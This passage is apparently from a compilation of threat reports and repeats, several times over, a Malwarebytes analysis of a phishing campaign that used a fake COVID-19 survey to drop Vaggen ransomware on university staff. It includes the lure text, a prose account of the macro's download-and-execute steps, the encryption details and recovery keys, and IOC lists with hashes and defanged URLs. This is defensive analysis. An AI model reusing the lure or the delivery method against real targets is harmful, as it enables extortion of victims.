take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1628 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1629 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1630 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1631 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1632 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1633 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1634 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1635 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1636 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1637 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1638 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1639 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1640 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1641 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1642 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1643 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1644 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1645 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1646 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1647 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1648 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1649 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1650 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1651 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1652 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1653 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1654 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1655 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1656 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1657 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1658 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1659 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1660 of 